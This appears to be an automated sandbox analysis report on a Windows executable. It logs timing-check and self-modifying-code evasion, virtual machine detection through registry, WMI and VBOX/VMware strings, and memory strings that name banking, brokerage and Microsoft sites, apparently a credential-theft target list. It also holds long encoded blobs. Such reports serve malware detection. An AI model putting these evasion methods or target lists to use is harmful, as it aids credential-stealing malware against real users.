Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64FC519 second address: 64FC51F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64FC51F second address: 64FC523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64FC60B second address: 64FC624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0CE39B5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64FC624 second address: 64FC628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64FCAB5 second address: 64FCAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 64FCAB9 second address: 64FCAD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Special instruction interceptor: First address: 9891DD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Special instruction interceptor: First address: B28A9E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Special instruction interceptor: First address: B53AED instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Special instruction interceptor: First address: B3289D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Special instruction interceptor: First address: BB3CAC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Special instruction interceptor: First address: 634D92E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Special instruction interceptor: First address: 634D9C6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Special instruction interceptor: First address: 64F52FE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Special instruction interceptor: First address: 64F3D6B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Special instruction interceptor: First address: 64F3940 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Special instruction interceptor: First address: 64FA503 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe TID: 5252	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe TID: 2268	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe TID: 3940	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe TID: 6140	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe TID: 2324	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe TID: 3892	Thread sleep time: -40020s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: TTsfmr1RWm.exe, TTsfmr1RWm.exe, 00000000.00000003.2563226009.000000000133C000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: TTsfmr1RWm.exe, 00000000.00000002.2633624769.0000000001297000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: TTsfmr1RWm.exe, 00000000.00000003.2320811380.0000000005AF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: TTsfmr1RWm.exe, 00000000.00000003.2345451604.0000000001358000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: TTsfmr1RWm.exe, 00000000.00000003.2416406816.0000000001359000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481839431.0000000001359000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2397844272.0000000001358000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2369470224.0000000001358000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MvcDymdblm2CC0Q5VXMkOQgYohlMadka/PhNe/MD3YKpEXhNQ4LhdYiADEA6OJjsMUXFJKIDUh4dyJpiEbehY8xIhAvThNKKRcv0Q3mFBaMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg2QJriGdD15v8AEBGUz5wmlUAhSdeuRka5XGneIZTmGpDHsAMQJpeyqP8xYFGCRUAjTnqs8pnAw7ZfJaRM+v+EFLwrtaPnqkMBbgxavDBYWANPixOUg4B+VzjJUjJYCBsUJclzNAchyM4pexDM02OhsoxyzrVD0C6Arsg91oEjxRVPKLcNQkNKVbxTCUW6soC2egIZoCPA7t4NFXTGOgK4Ztqmq9iAIBoyJ0taxTdWMw6zUbRFVnX0UrMS8+qbjpa49lGwqehC3MjgPLqrkBUFpyDPwpFUfupRlk6QW9NIcWAwPgjCgxdK6okaC1DF0K1ohFZDl5jASmKR3itQzUXpUraHaACX6vQ/9XAsTV4DSBo7dk3QZrlT5uo4dswPOpnsJUzg7nmNYtWoEgESZWcUTH2xOwuFIKgJgfVnHTK+JLmAb/RowJPMKhAsCv3xIKp3A3J0bIrT6Kneikg7dvk+GJmkHFttaJEguSLSv129ueZxPU8u/jjbOh58SbK79gHC6fbyHtiXugGa2piEQXxG+bmG0Cus4t/nq2zXfIR5aooh8B19rBJQYmQ20FEfz4uFqfTRmf/+lM6Ex746uEtS7v0ouFUMm83c8HpZ5PQzRdxuv47EQAZ9PEP/ZL6ecyVbL+8hOSJm6+yF+1A6ySN83i+WdwHy5TP6AGa54yNOQDMt0K/OHXfg+kqThLIfk6QFsLDCjZdpZTGOzjUsCOwZe5C6Gi8Q8TVSedBLpSfsvQj8BDp18kmZ3ex54YP0+Gs0yuOc0oHyahpuklKSN9DNVuBZhWH/uMHS1PAuQ5a2Lju9F/SWeKm7prBc0jVP84iPJxdnHVJ/HDDDbXL54Z89qdU0Vcin6gqmwXrJjGgP4IA8IR19qewIwTnUCQdrTZp1GW0u9j1R6sUgPUrm2c5cvXl9oot3E2Yi+lA6TVxs+wzTv0RyoJlnAb/LVyrQ+JXXkt08JQiqZojt7zmAq6A6TMAI3d99XjZOb1H2Ej05cPkbrRi3jsQ/1cA/+FiEaSdYURoSjyCbui7SR58sFKCEAn3HKH4uwm3eDW6eeqSVnn3vRu5S+ZPUrZgKYs8lgl1/fYieGCfbdnVWn1in27qZ19Yfhv4WKpf3SAPgywfR4sYK3wdc8VGoHmK3TWFL5jmOUHB49Ogy2jYoedRvh3h9D96fGhUBv0WbVKW3Fxq4ViXVL2x9NKNgA+vC8A5zUncE8H2TafulfEOSRqFccYu86ht5uc0nLgpiCrzoulmnAYZLfk4zbvX51WQrYMsc8ORmzRWmqqLFXZVINxxVKaxrpheUhYRfRx54cZnzZZxdMOYT0VhpWbZdIcVFHnb3QBFJEgxwyQpCTte0yQjzn7uCUZsuA+iYIJO4a+Hmq+9ONtmOcMMYl7TbktlwpTMf366yxqm+uPbWY4CHOTnw
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: TTsfmr1RWm.exe, 00000000.00000003.2417973568.00000000012CC000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481707605.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2294352901.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2397925602.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481598697.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2551152218.00000000012CB000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000002.2633624769.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2375441101.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: TTsfmr1RWm.exe, 00000000.00000002.2633624769.0000000001328000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: TTsfmr1RWm.exe, 00000000.00000002.2633624769.0000000001328000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"XOc
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: TTsfmr1RWm.exe, 00000000.00000003.2320143757.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: TTsfmr1RWm.exe, 00000000.00000003.2563081660.0000000001359000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MvcDymdblm2CC0Q5VXMkOQgYohlMadka/PhNe/MD3YKpEXhNQ4LhdYiADEA6OJjsMUXFJKIDUh4dyJpiEbehY8xIhAvThNKKRcv0Q3mFBaMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg2QJriGdD15v8AEBGUz5wmlUAhSdeuRka5XGneIZTmGpDHsAMQJpeyqP8xYFGCRUAjTnqs8pnAw7ZfJaRM+v+EFLwrtaPnqkMBbgxavDBYWANPixOUg4B+VzjJUjJYCBsUJclzNAchyM4pexDM02OhsoxyzrVD0C6Arsg91oEjxRVPKLcNQkNKVbxTCUW6soC2egIZoCPA7t4NFXTGOgK4Ztqmq9iAIBoyJ0taxTdWMw6zUbRFVnX0UrMS8+qbjpa49lGwqehC3MjgPLqrkBUFpyDPwpFUfupRlk6QW9NIcWAwPgjCgxdK6okaC1DF0K1ohFZDl5jASmKR3itQzUXpUraHaACX6vQ/9XAsTV4DSBo7dk3QZrlT5uo4dswPOpnsJUzg7nmNYtWoEgESZWcUTH2xOwuFIKgJgfVnHTK+JLmAb/RowJPMKhAsCv3xIKp3A3J0bIrT6Kneikg7dvk+GJmkHFttaJEguSLSv129ueZxPU8u/jjbOh58SbK79gHC6fbyHtiXugGa2piEQXxG+bmG0Cus4t/nq2zXfIR5aooh8B19rBJQYmQ20FEfz4uFqfTRmf/+lM6Ex746uEtS7v0ouFUMm83c8HpZ5PQzRdxuv47EQAZ9PEP/ZL6ecyVbL+8hOS